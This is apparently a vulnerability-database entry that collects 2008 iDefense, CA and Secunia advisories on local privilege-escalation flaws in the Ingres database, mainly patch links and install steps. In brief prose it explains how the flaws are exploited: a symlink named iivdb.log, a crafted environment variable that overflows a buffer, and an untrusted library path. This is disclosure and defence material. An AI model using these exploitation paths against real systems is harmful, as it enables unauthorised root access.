}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linux Such as above Ingres of ingvalidpw Vulnerability gained in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004682"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200808-049"
}
],
"trust": 0.6
}
}
VAR-200808-0318
Vulnerability from variot - Updated: 2025-04-10 22:56verifydb in Ingres 2.6, Ingres 2006 release 1 (aka 9.0.4), and Ingres 2006 release 2 (aka 9.1.0) on Linux and other Unix platforms sets the ownership or permissions of an iivdb.log file without verifying that it is the application's own log file, which allows local users to overwrite arbitrary files by creating a symlink with an iivdb.log filename. Ingres Database is prone to multiple local vulnerabilities: - Multiple local privilege-escalation vulnerabilities - A vulnerability that may allow attackers to overwrite arbitrary files. Local attackers can exploit these issues to gain elevated privileges on the affected computer, execute arbitrary code with superuser privileges, and overwrite arbitrary files owned by 'Ingres' user. iDefense Security Advisory 08.01.08 http://labs.idefense.com/intelligence/vulnerabilities/ Aug 01, 2008
I. BACKGROUND
Ingres Database is a database server used in several Computer Associates' products. For example, CA Directory Service uses the Ingres Database server. More information can be found on the vendor's website at the following URL.
http://ingres.com/downloads/prod-cert-download.php
II.
The vulnerability exists within the "verifydb" utility included with Ingres. It is used to cleanup unneeded files created in the database directory. This program has the set-uid bit set, and is owned by the "ingres" user.
The "verifydb" program improperly changes the permissions on files.
III. By itself, this vulnerability does not have very serious consequences.
IV. DETECTION
iDefense has confirmed the existence of this vulnerability in Ingres 2006 Enterprise Edition Release 2 for Linux x86 (32-bit). Other versions may also be affected.
V. WORKAROUND
iDefense is currently unaware of any workaround for this issue.
VI. VENDOR RESPONSE
"This problem has been identified and resolved by Ingres in the following releases: Ingres 2006 release 2 (9.1.0), Ingres 2006 release 1 (9.0.4), and Ingres 2.6."
For more information, refer to Ingres' advisory at the following URL.
http://www.ingres.com/support/security-alert-080108.php
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-3356 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.
VIII. DISCLOSURE TIMELINE
07/20/2007 Initial vendor response 07/23/2007 Initial vendor notification 08/01/2008 Coordinated public disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.
Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2008 iDefense, Inc.
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. Title: CA Products That Embed Ingres Multiple Vulnerabilities
CA Advisory Date: 2008-08-01
Reported By: iDefense Labs
Impact: A remote attacker can execute arbitrary code, gain privileges, or cause a denial of service condition.
Summary: CA products that embed Ingres contain multiple vulnerabilities that can allow a remote attacker to execute arbitrary code, gain privileges, or cause a denial of service condition. These vulnerabilities exist in the products and on the platforms listed below. These vulnerabilities do not impact any Windows-based Ingres installation. The first vulnerability, CVE-2008-3356, allows an unauthenticated attacker to potentially set the user and/or group ownership of a verifydb log file to be Ingres allowing read/write permissions to both. The third vulnerability, CVE-2008-3389, allows an unauthenticated attacker to obtain ingres user privileges. However, when combined with the unsecured directory privileges vulnerability (CVE–2008-3357), root privileges can be obtained.
Mitigating Factors: These vulnerabilities do not impact any Windows-based Ingres installation.
Severity: CA has given these vulnerabilities a High risk rating.
Affected Products: Admin r8.1 SP2 Advantage Data Transformer r2.2 Allfusion Harvest Change Manager r7.1 CA ARCserve Backup for Unix r11.1, r11.5 GA/SP1/SP2/SP3 CA ARCserve Backup for Linux r11.1, r11.5 GA/SP1/SP2/SP3 CA Directory r8.1 CA Job Management Option R11.0 CA Single Sign-On r8.1 CleverPath Aion BPM r10.1, r10.2 EEM 8.1, 8.2, 8.2.1 eTrust Audit/SCC 8.0 sp2 Identity Manager r12 NSM 3.0 0305, 3.1 0403, r3.1 SP1 0703, r11 Unicenter Asset Management r11.1, r11.2 Unicenter Remote Control r11.2 Unicenter Service Catalog r2.2, r11.1 Unicenter Service Metric Analysis r11.1 Unicenter ServicePlus Service Desk 6.0, r11, r11.1, r11.2 Unicenter Software Delivery r11.1, r11.2 Unicenter Workload Control Center r11
Affected Platforms: 1. Ingres verifydb file create permission override (CVE-2008-3356) This vulnerability impacts all platforms except Windows. 2. Ingres un-secure directory privileges with utility ingvalidpw (CVE - 2008-3357) This vulnerability impacts only Linux and HP platforms. 3. Ingres verifydb, iimerge, csreport buffer overflow (CVE-2008-3389) This vulnerability impacts only Linux and HP platforms.
Status and Recommendation: The most prudent course of action for affected customers is to download and apply the corrective maintenance. However, updates are provided only for the following releases: 2.6 and r3
Important: Customers using products that embed an earlier version of Ingres r3 should upgrade Ingres to the release that is currently supported (3.0.3/103 on Linux and 3.0.3/211 on UNIX platforms) before applying the maintenance updates. Please contact your product's Technical Support team for more information.
For these products: Admin r8.1 SP2 CA ARCserve Backup for Linux r11.5 SP2/SP3 CA Directory r8.1 CA Job Management Option R11.0 CA Single Sign-On r8.1 EEM 8.2 EEM 8.2.1 Identity Manager r12 NSM r11 Unicenter Asset Management r11.1 Unicenter Asset Management r11.2 Unicenter Remote Control r11.2 Unicenter Service Catalog r11.1 Unicenter Service Metric Analysis r11.1 Unicenter ServicePlus Service Desk r11 Unicenter ServicePlus Service Desk r11.1 Unicenter ServicePlus Service Desk r11.2 Unicenter Software Delivery r11.1 Unicenter Software Delivery r11.2 Unicenter Workload Control Center r11
Apply the update below that is listed for your platform (note that URLs may wrap):
AIX [3.0.3 (r64.us5/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12833-r64-us5.tar.z
HP-UX Itanium [3.0.3 (i64.hpu/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12831-i64-hpu.tar.z
HP-UX RISC [3.0.3 (hp2.us5/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12830-hp2-us5.tar.z
Linux AMD [3.0.3 (a64.lnx/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12835-a64-lnx.tar.z
Linux Intel 32bit [3.0.3 (int.lnx/103)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.103.12836-int-lnx.tar.z
Linux Itanium [3.0.3 (i64.lnx/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12838-i64-lnx.tar.z
Solaris SPARC [3.0.3 (su9.us5/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12834-su9-us5.tar.z
Solaris x64/x86 [3.0.3 (a64.sol/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12832-a64-sol.tar.z
Ingres r3 Vulnerability Updates Install Steps (August 1, 2008)
Unix/Linux: 1. Log on to your system using the installation owner account and make sure the environment is set up correctly: 1. II_SYSTEM must be set to the Ingres system files 2. PATH must include $II_SYSTEM/bin and $II_SYSTEM/utility directories. 2. Change directory to the root directory of the Ingres installation or use a previously created directory. cd $II_SYSTEM/ingres or cd 3. Copy the download maintenance update file in to the current directory and uncompress 4. Read in the update file with the following commands: umask 022 tar xf [update_file] This will create the directory: $II_SYSTEM/ingres/patchXXXXX or /patchXXXXX Note: ‘XXXXX' in patchXXXXX refers to the update number 5. Stop all Ingres processes with the ‘ingstop' utility: ingstop 6. Change directory to the patch directory: cd patchXXXXX 7. Within the patch directory run the following command: ./utility/iiinstaller Please check the $II_SYSTEM/ingres/files/patch.log file to make sure the patch was applied successfully. Also check the $II_SYSTEM/ingres/version.rel to make sure the patch is referenced. Note: The patch can also be installed silently using the ‘-m' flag with iiinstaller: ./utility/iiinstaller -m 8. Once the patch install has been complete, re-link the iimerge binary with the following command: iilink 9. Ingres can then be restarted with the ‘ingstart' utility: ingstart
For these products: Advantage Data Transformer r2.2 Allfusion Harvest Change Manager r7.1 ARCserve for Linux r11.5 GA/SP1 CleverPath Aion BPM r10.1 CleverPath Aion BPM r10.2
Apply the build below that is listed for your platform (note that URLs may wrap):
AIX ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12833-r64-us5.tar
HP-UX Itanium ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12831-i64-hpu.tar
HP-UX RISC ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12830-hp2-us5.tar
Linux AMD EI build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-EI-linux-x86_64.tar.gz
Linux AMD II build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-linux-x86_64.tgz
Linux Intel EI build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-103-EI-linux-i386.tgz
Linux Intel II build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-103-pc-linux-i386.tgz
Linux Itanium EI build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-EI-linux-ia64.tar.gz
Linux Itanium II build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-linux-ia64.tgz
Solaris SPARC ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12834-su9-us5.tar
Solaris x64/x86 ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12832-a64-sol.tar
Ingres r3 Build Install Steps (August 1, 2008)
Important: Prior to installing the build, a full operating system backup of the $II_SYSTEM/ingres directory on Unix/Linux and %II_SYSTEM%\ingres directory on Windows must be taken with Ingres completely shut down. Also, a backup of any other DATA locations that you may have must be taken, again with Ingres shut down. In case there is a problem with the update install, this allows Ingres to be restored from the backup.
Unix: 1. Log in to the system as the installation owner and make sure the environment is set up correctly: 1. II_SYSTEM must be set to the Ingres home directory 2. PATH must include $II_SYSTEM/ingres/bin and $II_SYSTEM/ingres/utility directories 3. Add $II_SYSTEM/ingres/lib to the shared library path 4. Set TERM to ‘vt100' and TERM_INGRES to ‘vt100fx' 2. Copy the downloaded update file to the /tmp directory and uncompress 3. Read in the update file with the following commands: umask 022 tar xf [update_file] This creates a directory containing the distribution and other files. 4. Stop all applications that may be connected to or using any of the files in the Ingres instance. 5. Stop all Ingres processes with the ‘ingstop' utility: ingstop 6. Important: Take an operating system backup of the $II_SYSTEM/ingres directory and other DATA locations that you may have elsewhere. Also, copy the $II_SYSTEM/ingres/files/config.dat and $II_SYSTEM/ingres/files/symbol.tbl files to a safe location to ensure that the configuration can be restored. 7. From the root directory of the Ingres installation ($II_SYSTEM/ingres), run the following command: tar xf /tmp//ingres.tar install 8. Run the following command: install/ingbuild 9. The initial install screen appears. 10. In the Distribution medium enter the full path to the ‘ingres.tar' file (including the file) (See step 4). 11. Choose PackageInstall from the list of installation options and then choose ‘Stand alone DBMS Server' from the list of packages. Then choose ExpressInstall. 12. Choose Yes in the pop-up screen and press Enter key. The install utility verifies that each component was transferred properly from the distribution medium. When this is finished (without errors), another pop-up screen for setting up the components comes up. 13. Select Yes and press Enter key to go to the Setup program. 14. Once the installation is complete, check the $II_SYSTEM/ingres/files/install.log for any errors. Also, check the $II_SYSTEM/ingres/version.rel file to verify the new build is referenced; this should show 3.0.3 for the build. 15. If there are no errors, then restore the $II_SYSTEM/ingres/files/config.dat and $II_SYSTEM/ingres/files/symbol.tbl files from the copies made in step 6 to replace the existing files. 16. Start Ingres using the ‘ingstart' utility: ingstart 17. Upgrade the databases in the installation to the new release level: upgradedb -all
Linux: 1. Log on to the machine as ‘root'. 2. Copy the downloaded build update file and to a previously chosen directory and uncompress. 3. Read in the update file with the following command: tar xf [update file] This creates a directory containing rpm packages for all of the Ingres tools. 4. Shut down any non-Ingres application(s) that may be connected to or using any of the files in the specified Ingres instance. 5. Stop all Ingres processes with the ‘ingstop' utility: ingstop 6. Important: Take an operating system backup of the $II_SYSTEM/ingres directory and other DATA locations that you may have elsewhere. 7. From the directory that was created in step 3, install the update rpms with the following command: rpm –Uvh *.rpm If the following error is seen for either the ‘ca-ingres-documentation-3.0.3-103', the ‘ca-ingres-CATOSL-3.0.3-103' or the ‘ca-cs-utils-11.0.04348-0000' (or all of them) packages, remove them from the directory containing the rpms and re-run the above command: package is already installed 8. If the installation finishes successfully, then log on as ‘ingres' to the machine and start Ingres using the ‘ingstart' utility: ingstart 9. Upgrade ‘mdb' database with the following command: upgradedb -all
For these products: CA ARCserve Backup for Unix r11.1 CA ARCserve Backup for Unix r11.5 GA/SP1/SP2 CA ARCserve Backup for Unix r11.5 SP3 CA ARCserve Backup for Linux r11.1 EEM 8.1 eTrust Audit/SCC 8.0 sp2 NSM 3.0 0305 NSM 3.1 0403 NSM r3.1 SP1 0703 Unicenter Service Catalog r2.2 Unicenter ServicePlus Service Desk 6.0
Apply the update below that is listed for your platform (note that URLs may wrap):
AIX 32bit [2.6/xxxx (rs4.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12718.tar.Z
AIX 64bit [2.6/xxxx (r64.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12798.tar.Z
HP-UX with ARCserve 11.1 or 11.5/GA/SP1/SP2/SP3 https://support.ca.com/irj/portal/anonymous/solndtls?aparNo=RO01277&os=HP&actionID=3
HP-UX Itanium [2.6/xxxx (i64.hpu/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12748.tar.Z
HP-UX RISC 32bit [2.6/xxxx (hpb.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12742.tar.Z
HP-UX RISC 32bit [2.6/xxxx (hpb.us5/00)DBL] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12888.tar.Z
HP-UX RISC 64bit [2.6/xxxx (hp2.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12749.tar.Z
HP Tru64 UNIX [2.6/xxxx (axp.osf/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12676.tar.Z
Linux AMD64 [2.6/xxxx (a64.lnx/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12809.tar.Z
Linux Intel 32bit [2.6/xxxx (int.lnx/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12645.tar.Z
Linux Intel 32bit [2.6/xxxx (int.lnx/00)DBL] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12647.tar.Z
Linux Intel 32bit [2.6/xxxx (int.lnx/00)LFS] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12646.tar.Z
Linux Itanium [2.6/xxxx (i64.lnx/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12648.tar.Z
Linux S/390 [2.6/xxxx (ibm.lnx/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12877.tar.Z
Solaris SPARC 32bit [2.6/xxxx (su4.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12713.tar.Z
Solaris SPARC 32bit double [2.6/xxxx (su4.us5/00)DBL] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12879.tar.Z
Solaris SPARC 64bit [2.6/xxxx (su9.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12751.tar.Z
Ingres 2.6 Vulnerability Updates Install Steps (August 1, 2008)
Unix/Linux: 1. Log on to your system using the installation owner account and make sure the environment is set up correctly: 1. II_SYSTEM must be set to the Ingres system files 2. PATH must include $II_SYSTEM/bin and $II_SYSTEM/utility directories. 2. Change directory to the root directory of the Ingres installation or use a previously created directory. cd $II_SYSTEM/ingres or cd 3. Copy the download maintenance update file in to the current directory and uncompress 4. Read in the update file with the following commands: umask 022 tar xf [update_file] This will create the directory: $II_SYSTEM/ingres/patchXXXXX or /patchXXXXX Note: ‘XXXXX' in patchXXXXX refers to the update number 5. Stop all Ingres processes with the ‘ingstop' utility: ingstop 6. Change directory to the patch directory: cd patchXXXXX 7. Within the patch directory run the following command: ./utility/iiinstaller Please check the $II_SYSTEM/ingres/files/patch.log file to make sure the patch was applied successfully. Also check the $II_SYSTEM/ingres/version.rel to make sure the patch is referenced. Note: The patch can also be installed silently using the ‘-m' flag with iiinstaller: ./utility/iiinstaller -m 8. Once the patch install has been complete, re-link the iimerge binary with the following command: iilink 9. Ingres can then be restarted with the ‘ingstart' utility: ingstart
How to determine if you are affected:
For these products: Admin r8.1 SP2 ARCserve for Linux r11.5 SP2/SP3 CA Directory r8.1 CA Job Management Option R11.0 CA Single Sign-On r8.1 EEM 8.2 EEM 8.2.1 Identity Manager r12 NSM r11 Unicenter Asset Management r11.1 Unicenter Asset Management r11.2 Unicenter Remote Control r11.2 Unicenter Service Catalog r11.1 Unicenter Service Metric Analysis r11.1 Unicenter ServicePlus Service Desk r11 Unicenter ServicePlus Service Desk r11.1 Unicenter ServicePlus Service Desk r11.2 Unicenter Software Delivery r11.1 Unicenter Software Delivery r11.2 Unicenter Workload Control Center r11
The Ingres release information is maintained in %II_SYSTEM%\ingres\version.rel: UNIX or Linux: cat version.rel
The release identifier will be as follows: Operating System Release identifier HP Sparc 32/64bit II 3.0.3 (hp2.us5/211) HP Itanium II 3.0.3 (i64.hpu/211) Intel Solaris 32/64bit II 3.0.3 (a64.sol/211) AIX 32/64bit II 3.0.3 (r64.us5/211) Solaris 32/64bit II 3.0.3 (su9.us5/211) AMD Linux II 3.0.3 (a64.lnx/211) Intel Linux II 3.0.3 (int.lnx/103) Itanium Linux II 3.0.3 (i64.lnx/211)
Notes: 1. You would need to install the Ingres build instead of the patch if either of the following is true: 1. If the Ingres release for your platform is not 3.0.3 in the release identifier or 2. The Ingres release is 3.0.3 but the build level is not 103 for Linux and 211 for all the Unix platforms. If either of the above is true then download and apply the latest build for your operating system(s). 2. If the OS platform you are running Ingres on is not listed, please contact Technical Support.
For these products: Advantage Data Transformer r2.2 Allfusion Harvest Change Manager r7.1 ARCserve for Linux r11.5 GA/SP1 CleverPath Aion BPM r10.1 CleverPath Aion BPM r10.2
The maintenance updates are provided for the latest r3 builds supported by CA which are 3.0.3/103 (Linux) and 3.03/211 (UNIX platforms). If the build embedded is earlier than 3.0.3, it has to be upgraded to 3.0.3 to fix the vulnerabilities.
The Ingres release information is maintained in %II_SYSTEM%\ingres\version.rel: UNIX or Linux: cat version.rel
The release identifier will be as follows: Operating System Release identifier HP Sparc 32/64bit II 3.0.3 (hp2.us5/211) HP Itanium II 3.0.3 (i64.hpu/211) Intel Solaris 32/64bit II 3.0.3 (a64.sol/211) AIX 32/64bit II 3.0.3 (r64.us5/211) Solaris 32/64bit II 3.0.3 (su9.us5/211) AMD Linux II 3.0.3 (a64.lnx/211) Intel Linux II 3.0.3 (int.lnx/103) Itanium Linux II 3.0.3 (i64.lnx/211)
Important: For Linux (AMD, Intel and Itanium) platforms, after applying the build provided on this page, please download and apply the maintenance update. For the other platforms, the builds are patched to the latest maintenance update. Note: 1. If the release you are using is already 3.0.3 build 103 on Linux and 3.0.3 build 211 on Unix, then download and install the maintenance update. 2. If the OS platform you are running Ingres on is not listed, please contact Technical Support.
For these products: CA ARCserve Backup for Unix r11.1 CA ARCserve Backup for Unix r11.5 GA/SP1/SP2 CA ARCserve Backup for Unix r11.5 SP3 CA ARCserve Backup for Linux r11.1 EEM 8.1 eTrust Audit/SCC 8.0 sp2 NSM 3.0 0305 NSM 3.1 0403 NSM r3.1 SP1 0703 Unicenter Service Catalog r2.2 Unicenter ServicePlus Service Desk 6.0
The Ingres release information is maintained in %II_SYSTEM%\ingres\version.rel: UNIX or Linux: cat version.rel
The release identifier will be as follows: Operating System Release identifier AIX 32bit II 2.6/xxxx (rs4.us5/00) AIX 64bit II 2.6/xxxx (r64.us5/00) HP-UX Itanium II 2.6/xxxx (i64.hpu/00) HP-UX RISC 32bit II 2.6/xxxx (hpb.us5/00) HP-UX RISC 32bit II 2.6/xxxx (hpb.us5/00)DBL HP-UX RISC 64bit II 2.6/xxxx (hp2.us5/00) HP Tru64 UNIX II 2.6/xxxx (axp.osf/00) Linux AMD64 II 2.6/xxxx (a64.lnx/00) Linux Intel 32bit II 2.6/xxxx (int.lnx/00) Linux Intel 32bit II 2.6/xxxx (int.lnx/00)DBL Linux Intel 32bit II 2.6/xxxx (int.lnx/00)LFS Linux Itanium II 2.6/xxxx (i64.lnx/00) Linux S/390 II 2.6/xxxx (ibm.lnx/00) Solaris SPARC 32bit II 2.6/xxxx (su4.us5/00) Solaris SPARC 32bit double II 2.6/xxxx (su4.us5/00)DBL Solaris SPARC 64bit II 2.6/xxxx (su9.us5/00)
Note: 1. If the Ingres release embedded in your product is not 2.6, please get the appropriate update here. 2. If the OS platform you are running Ingres on is not listed, please contact Technical Support. 3. For HP-UX platform with CA ARCserve Backup 11.1 or 11.5/GA/SP1/SP2/SP3, download the published ARCserve fix, RO01277: https://support.ca.com/irj/portal/anonymous/solndtls?aparNo=RO01277&os=HP&actionID=3 and follow the enclosed instructions to install the security patch.
Workaround: None
References (URLs may wrap): CA Support: http://support.ca.com/ Security Notice for CA Products That Embed Ingres https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989 Solution Document Reference APARs: RO01277 (ARCserve only) CA Security Response Blog posting: CA Products That Embed Ingres Multiple Vulnerabilities community.ca.com/blogs/casecurityresponseblog/archive/2008/08/06.aspx Reported By: iDefense Labs Ingres Database for Linux verifydb Insecure File Permissions Modification Vulnerability http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731 Ingres Database for Linux libbecompat Stack Based Buffer Overflow Vulnerability http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732 Ingres Database for Linux ingvalidpw Untrusted Library Path Vulnerability http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=733 Ingres Security Vulnerability Announcement as of August 01, 2008 http://www.ingres.com/support/security-alert-080108.php CVE References: CVE-2008-3356 - Ingres verifydb file create permission override. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3356 CVE-2008-3357 - Ingres un-secure directory privileges with utility ingvalidpw. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3357 CVE-2008-3389 - Ingres verifydb, iimerge, csreport buffer overflow. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3389 OSVDB References: Pending http://osvdb.org/
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://support.ca.com.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to our product security response team. https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2008 CA. All rights reserved. ----------------------------------------------------------------------
Want a new job?
http://secunia.com/secunia_security_specialist/ http://secunia.com/hardcore_disassembler_and_reverse_engineer/
International Partner Manager - Project Sales in the IT-Security Industry: http://corporate.secunia.com/about_secunia/64/
TITLE: Ingres Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA31357
VERIFY ADVISORY: http://secunia.com/advisories/31357/
CRITICAL: Less critical
IMPACT: Privilege escalation
WHERE: Local system
SOFTWARE: Ingres 2.x http://secunia.com/product/14576/ Ingres 2006 (9.x) http://secunia.com/product/14574/
DESCRIPTION: Some vulnerabilities have been reported in Ingres, which can be exploited by malicious, local users to gain escalated privileges.
2) A boundary error exists within the "libbecompat" library that is used by several of the setuid "ingres" utilities. This can be exploited to cause a stack-based buffer overflow e.g. via a specially crafted environmental variable.
3) An error exists within the "ingvalidpw" utility due to being setuid "root" and loading shared libraries from a directory owned by the "ingres" user.
SOLUTION: The vendor has issued fixes. Please see the knowledge base document (customer login required). http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:416012+HTMPL=kt_document_view.htmpl
PROVIDED AND/OR DISCOVERED BY: An anonymous researcher, reported via iDefense.
ORIGINAL ADVISORY: Ingres: http://www.ingres.com/support/security-alert-080108.php
iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=733
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200808-0318",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ingres",
"scope": "eq",
"trust": 2.4,
"vendor": "ingres",
"version": "2.6"
},
{
"model": "ingres",
"scope": "eq",
"trust": 1.6,
"vendor": "ingres",
"version": "2006"
},
{
"model": "ingres",
"scope": "eq",
"trust": 0.8,
"vendor": "ingres",
"version": "2006 release 1"
},
{
"model": "ingres",
"scope": "eq",
"trust": 0.8,
"vendor": "ingres",
"version": "and 2006 release 2"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "20069.1"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "20069.0.4"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "20060"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
